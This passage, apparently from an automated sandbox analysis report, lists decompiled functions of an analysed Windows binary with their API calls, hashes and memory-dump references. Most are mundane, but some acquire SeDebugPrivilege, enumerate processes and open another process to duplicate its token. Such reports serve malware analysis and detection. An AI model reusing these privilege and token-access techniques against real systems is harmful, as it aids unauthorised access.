				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}








                                                                                                                            0x0040543f
                                                                                                                            0x00405456
                                                                                                                            0x00405462
                                                                                                                            0x00405467
                                                                                                                            0x0040546d
                                                                                                                            0x00405478
                                                                                                                            0x00405489
                                                                                                                            0x0040548d
                                                                                                                            0x00000000
                                                                                                                            0x00405492
                                                                                                                            0x00405496

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00405456
                                                                                                                              • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                              • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                              • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                                              • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                                            • wcscat.MSVCRT ref: 00405478
                                                                                                                            • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3725422290-0
                                                                                                                            • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                            • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                                            • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                            • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004054B9, Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004054B9(intOrPtr* __esi) {

				free( *(__esi + 0x10));
				free( *(__esi + 0xc)); // executed
				 *((intOrPtr*)(__esi)) = 0;
				 *((intOrPtr*)(__esi + 4)) = 0;
				 *(__esi + 0xc) = 0;
				 *(__esi + 0x10) = 0;
				 *((intOrPtr*)(__esi + 0x1c)) = 0;
				 *((intOrPtr*)(__esi + 8)) = 0;
				return 0;
			}



                                                                                                                            0x004054bc
                                                                                                                            0x004054c4
                                                                                                                            0x004054cd
                                                                                                                            0x004054cf
                                                                                                                            0x004054d2
                                                                                                                            0x004054d5
                                                                                                                            0x004054d8
                                                                                                                            0x004054db
                                                                                                                            0x004054de

                                                                                                                            APIs
                                                                                                                            • free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                                                            • free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1294909896-0
                                                                                                                            • Opcode ID: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                                                            • Instruction ID: 7665469e3ee5729aacaba78e143212aa4928b7d925741869fd88885e7d369011
                                                                                                                            • Opcode Fuzzy Hash: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                                                            • Instruction Fuzzy Hash: C2D0A2B1515B018ED7B5DF39E405506BBF1EF083143108D7E90AED2A51E735A5549F48
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}






                                                                                                                            0x00408f4c
                                                                                                                            0x00408f57
                                                                                                                            0x00408f60
                                                                                                                            0x00408f62
                                                                                                                            0x00408f67
                                                                                                                            0x00408f67
                                                                                                                            0x00408f71

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                              • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 187924719-0
                                                                                                                            • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                            • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                                            • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                            • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 37%
                                                                                                                            			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                                                                            0x004098fa
                                                                                                                            0x004098fc
                                                                                                                            0x00409901
                                                                                                                            0x00409907
                                                                                                                            0x00000000
                                                                                                                            0x0040991c
                                                                                                                            0x00409918
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                              • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                              • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                              • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                              • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$FileModuleName
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3859505661-0
                                                                                                                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                            • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                            • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}






                                                                                                                            0x004095da
                                                                                                                            0x004095da
                                                                                                                            0x004095de
                                                                                                                            0x004095e1
                                                                                                                            0x004095e7
                                                                                                                            0x004095e7
                                                                                                                            0x004095ee
                                                                                                                            0x004095fc

                                                                                                                            APIs
                                                                                                                            • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeLibrary
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3664257935-0
                                                                                                                            • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                            • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                                            • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                            • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}



                                                                                                                            0x0040a3d0
                                                                                                                            0x0040a3d9

                                                                                                                            APIs
                                                                                                                            • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumNamesResource
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3334572018-0
                                                                                                                            • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                            • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                                            • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                            • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004055D1, Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004055D1(void* __eax, signed int* __esi) {
				void* _t7;
				signed int* _t9;

				_t9 = __esi;
				_t7 = __eax;
				if(__esi[4] != 0) {
					free(__esi[4]); // executed
					__esi[4] = __esi[4] & 0x00000000;
				}
				_t9[2] = _t9[2] & 0x00000000;
				 *_t9 =  *_t9 & 0x00000000;
				return _t7;
			}





                                                                                                                            0x004055d1
                                                                                                                            0x004055d1
                                                                                                                            0x004055d5
                                                                                                                            0x004055da
                                                                                                                            0x004055df
                                                                                                                            0x004055e3
                                                                                                                            0x004055e4
                                                                                                                            0x004055e8
                                                                                                                            0x004055eb

                                                                                                                            APIs
                                                                                                                            • free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1294909896-0
                                                                                                                            • Opcode ID: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                                                            • Instruction ID: d9e56b4edb5911b8eb4629cf82416adf3d5ef3fa420fba14bebf6bcebba5d7e5
                                                                                                                            • Opcode Fuzzy Hash: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                                                            • Instruction Fuzzy Hash: FEC00272420B01DBE7355F21D8093A6B3F1FB1032BFA04E6E90A6148E1C7BCA58CCA48
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 82%
                                                                                                                            			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

















                                                                                                                            0x0040b04d
                                                                                                                            0x0040b05e
                                                                                                                            0x0040b060
                                                                                                                            0x0040b063
                                                                                                                            0x0040b06a
                                                                                                                            0x0040b06d
                                                                                                                            0x0040b076
                                                                                                                            0x0040b07b
                                                                                                                            0x0040b07e
                                                                                                                            0x0040b084
                                                                                                                            0x0040b08e
                                                                                                                            0x0040b0a8
                                                                                                                            0x0040b0aa
                                                                                                                            0x0040b0ad
                                                                                                                            0x0040b0b0
                                                                                                                            0x0040b0b3
                                                                                                                            0x0040b0b6
                                                                                                                            0x0040b0b8
                                                                                                                            0x0040b0bb
                                                                                                                            0x0040b0be
                                                                                                                            0x0040b0c1
                                                                                                                            0x0040b0c4
                                                                                                                            0x0040b0c7
                                                                                                                            0x0040b0ca
                                                                                                                            0x0040b0cd
                                                                                                                            0x0040b0cd
                                                                                                                            0x0040b0e5
                                                                                                                            0x0040b11f
                                                                                                                            0x0040b128
                                                                                                                            0x0040b0e7
                                                                                                                            0x0040b0e7
                                                                                                                            0x0040b0f1
                                                                                                                            0x0040b0f2
                                                                                                                            0x0040b0f3
                                                                                                                            0x0040b0fb
                                                                                                                            0x0040b0fd
                                                                                                                            0x0040b0fe
                                                                                                                            0x0040b11d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040b11d
                                                                                                                            0x0040b13c
                                                                                                                            0x0040b151
                                                                                                                            0x0040b166
                                                                                                                            0x0040b17b
                                                                                                                            0x0040b190
                                                                                                                            0x0040b1a5
                                                                                                                            0x0040b1ba
                                                                                                                            0x0040b1cf
                                                                                                                            0x0040b1d6
                                                                                                                            0x0040b1d7
                                                                                                                            0x0040b1d8
                                                                                                                            0x0040b1de
                                                                                                                            0x0040b1e3

                                                                                                                            APIs
                                                                                                                            • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                            • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                            • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                            • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                            • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                            • wcscpy.MSVCRT ref: 0040B128
                                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                            • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                            • API String ID: 1223191525-1542517562
                                                                                                                            • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                            • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                                            • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                            • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 87%
                                                                                                                            			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}













                                                                                                                            0x00406466
                                                                                                                            0x0040647d
                                                                                                                            0x00406484
                                                                                                                            0x00406499
                                                                                                                            0x004064a0
                                                                                                                            0x004064af
                                                                                                                            0x004064b4
                                                                                                                            0x004064bb
                                                                                                                            0x004064cd
                                                                                                                            0x004064d2
                                                                                                                            0x004064d4
                                                                                                                            0x004064e4
                                                                                                                            0x004064ea
                                                                                                                            0x004064ea
                                                                                                                            0x004064f3
                                                                                                                            0x00406503
                                                                                                                            0x00406514
                                                                                                                            0x00406525
                                                                                                                            0x0040653b
                                                                                                                            0x0040654e
                                                                                                                            0x00406568
                                                                                                                            0x00406572
                                                                                                                            0x0040657a
                                                                                                                            0x00406582
                                                                                                                            0x0040658a
                                                                                                                            0x00406596

                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00406484
                                                                                                                            • memset.MSVCRT ref: 004064A0
                                                                                                                              • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                              • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                              • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                              • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                              • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                              • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                              • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                              • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                                            • wcscpy.MSVCRT ref: 004064E4
                                                                                                                            • wcscpy.MSVCRT ref: 004064F3
                                                                                                                            • wcscpy.MSVCRT ref: 00406503
                                                                                                                            • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                                            • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                                            • wcscpy.MSVCRT ref: 0040657A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                            • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                            • API String ID: 3037099051-2314623505
                                                                                                                            • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                            • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                                            • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                            • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401E44, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
				char _v8;
				void* _v12;
				void* __esi;
				void* _t18;
				intOrPtr* _t22;
				void* _t23;
				void* _t28;
				int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;

				_v8 = 0;
				_t18 = OpenProcess(0x2000000, 0, _a8);
				_v12 = _t18;
				if(_t18 == 0) {
					_t37 = GetLastError();
				} else {
					_t39 = _a4 + 0x800;
					_a8 = 0;
					E0040289F(_t39);
					_t22 =  *((intOrPtr*)(_t39 + 4));
					if(_t22 == 0) {
						_t23 = 0;
					} else {
						_t23 =  *_t22(_v12, 2,  &_a8);
					}
					if(_t23 == 0) {
						_t37 = GetLastError();
					} else {
						_a4 = _a8;
						E0040289F(_t39);
						_t40 =  *((intOrPtr*)(_t39 + 8));
						if(_t40 == 0) {
							_t28 = 0;
						} else {
							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
						}
						if(_t28 == 0) {
							_t37 = GetLastError();
						} else {
							 *_a12 = _v8;
							_t37 = 0;
						}
						CloseHandle(_a8);
					}
					CloseHandle(_v12);
				}
				return _t37;
			}













                                                                                                                            0x00401e59
                                                                                                                            0x00401e5c
                                                                                                                            0x00401e64
